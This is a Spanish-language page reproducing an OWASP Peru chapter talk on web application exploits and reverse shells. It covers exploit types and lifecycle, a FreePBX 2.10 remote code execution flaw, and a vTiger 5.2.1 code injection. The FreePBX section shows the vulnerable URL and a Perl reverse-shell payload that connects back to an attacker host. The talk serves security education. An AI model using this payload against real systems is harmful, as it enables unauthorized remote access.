PDF de programación - Web Application exploiting and Reversing Shell

Imágen de pdf Web Application exploiting and Reversing Shell

Web Application exploiting and Reversing Shellgráfica de visualizaciones

Publicado el 18 de Septiembre del 2017
752 visualizaciones desde el 18 de Septiembre del 2017
1.003,3 KB
34 paginas
Creado hace 9a (27/06/2014)
OWASP Perú Chapter

Meeting

The OWASP Foundation

http://www.owasp.org

Web Application
exploiting and
Reversing Shell

Juan Oliva
@jroliva

[email protected]

Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

Copyright © The OWASP Foundation

$ Whois @jroliva

• Juan Oliva

Linuxero de toda la vida
Consultor de proyectos de Ethical Hacking
Consultor de proyectos de Telefonía y VoIP
Certificaciones
C|EH, CPTE, OSEH, BNS, dCAA, ECE, ESM, LPIC-1, Novell CLA
Intructor & Trainig


- Certificación Linux Professional Institute LPI-C1

- Certificación de Seguridad de Elastix “ESM”

- Cursos Ethical Hacking y Voz sobre IP

2

DESCARGO DE RESPONSABILIDAD

Esta presentación tiene como propósito proveer
unicamente información. No aplicar este material ni
conocimientos sin el Consentimiento explícito que
autorice a hacerlo. Los lectores (participantes, oyentes,
videntes) asumen la responsabilidad completa por la
aplicación o experimentación de este material y/o
conocimientos presentados. El(los) autor(es) quedan
exceptuados de cualquier reclamo directo o indirecto
respecto a daños que puedan haber sido causados por
la aplicación de este material y/o conocimientos expuestos.

La información aquí expuesta representa las opiniones y
perspectivas propias del autor respecto a la materia y no
representan ninguna posicion oficial de alguna organización
asociada.

3

Introducción

4

Qué es un exploit

5

Qué es un exploit

• Es un programa o código
• Explota o aprovecha una vulnerabilidad

existente

• Se puede ejecutar de forma manual
• Pero tambien de forma automatizada

6

Qué es un exploit

• El código no necesariamente puede ser

malisioso en si mismo

• Sin embargo siempre se usa para otros

fines como :

Acceso no autorizado a sistemas
Malware como gusanos y trojanos

7

Tipos de exploit

8

Tipos de exploits

Remotos
• Ejecutados desde una ubicacion diferente

a la red de la victima

• Si es exitoso es posible tomar el control

del equipo comprometido parcial o
totalmente.

Locales
• Permite elevar privilegios de un sistema

desde un usuario no privilegiado

9

Donde los encuentran??

• exploit-db.com
• packetstormsecurity.com
• exploitsdownload.com
• cvedetails.com
• Entre otros...

10

Como se hacen los

exploits

11

Como se hacen los

exploits

Pueden ser escritos en diferentes lenguajes

• C, C++
• perl
• bash
• nc

12

Como se hacen los

exploits

Sin embargo , tambien es posible
desarrollarlos en python o PHP inclusive

• PHP
• PYTHON

13

Ciclo de vida de un

exploit

14

Ciclo de vida de un

exploit
(formal)

15

Ciclo de vida de un

exploit

(resumido)

16

Aplicaciones web

vulnerables

17

Aplicaciones web

vulnerables

18

Aplicaciones web

vulnerables

FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution

Vulnerabilidad es de tipo “Remote Code Execution Exploit” ,
es decir inyecta código en una página no autentificada
variables que generan la ejecución de sentencias del sistema
operativo vía la función “system” de asterisk ,

Resultado : genera una conexión reversa desde el host
atacado hacia el host del atacante vía el puerto 443.

19

Pero como funciona ??

20

Pero como funciona ??

21

Pero como funciona ??

22

Pero como funciona ??

URL A LA CUAL INGRESA EL PROGRAMA:

/recordings/misc/callme_page.php?action=c&callmenum='

23

Pero como funciona ??

Código que inyecta :

Un poco feo no ??

24

Pero como funciona ??

Código que inyecta
str(extension) '@from-internal/n
Application: system
Data: perl -MIO -e '$p=fork;exit,if($p);
$c=new IO::Socket::INET(PeerAddr,"' str(lhost) ':' str(lport) '");
STDIN->fdopen($c,r);
$~->fdopen($c,w);system$_ while<>;'

Ahora si la veo !!

25

Pero como funciona ??

26

Pero como funciona ??

Bingo tengo shell !!

27

Pero como funciona ??

Ahora vamos a la práctica

DEMO TIME !!

Exploit en Freepbx 2.10

28

Aplicaciones web

vulnerables

29

Aplicaciones web

vulnerables

PHP CODE INYECTION en VTIGER 5.2.1
Descripción : El fundamento básico de esta técnica, es inyectar
código arbitrario , como lo hace una inyección SQL

Resultado : Obtención de una Shell reversa.

30

Pero como funciona ??

Ahora vamos a la práctica

DEMO TIME !!

Exploit en Vtiger 5.2.1

31

32

Conclusiones
Es necesario siempre estar
informado de las nuevas
vulnerabilidades.

Usa twitter no facebook para

informarte.

No por que sea, software libre es
mas vulnerable... al contrario!!

33

Any Questions?

Twiter : @jroliva

Blog : http://jroliva.wordpress.com/

Juan Oliva

Consultor en Ethical Hacking y Voip

gtalk :[email protected]
  • Links de descarga
http://lwp-l.com/pdf6996

Comentarios de: Web Application exploiting and Reversing Shell (0)


No hay comentarios
 

Comentar...

Nombre
Correo (no se visualiza en la web)
Valoración
Comentarios...
CerrarCerrar
CerrarCerrar
Cerrar

Tienes que ser un usuario registrado para poder insertar imágenes, archivos y/o videos.

Puedes registrarte o validarte desde aquí.

Codigo
Negrita
Subrayado
Tachado
Cursiva
Insertar enlace
Imagen externa
Emoticon
Tabular
Centrar
Titulo
Linea
Disminuir
Aumentar
Vista preliminar
sonreir
dientes
lengua
guiño
enfadado
confundido
llorar
avergonzado
sorprendido
triste
sol
estrella
jarra
camara
taza de cafe
email
beso
bombilla
amor
mal
bien
Es necesario revisar y aceptar las políticas de privacidad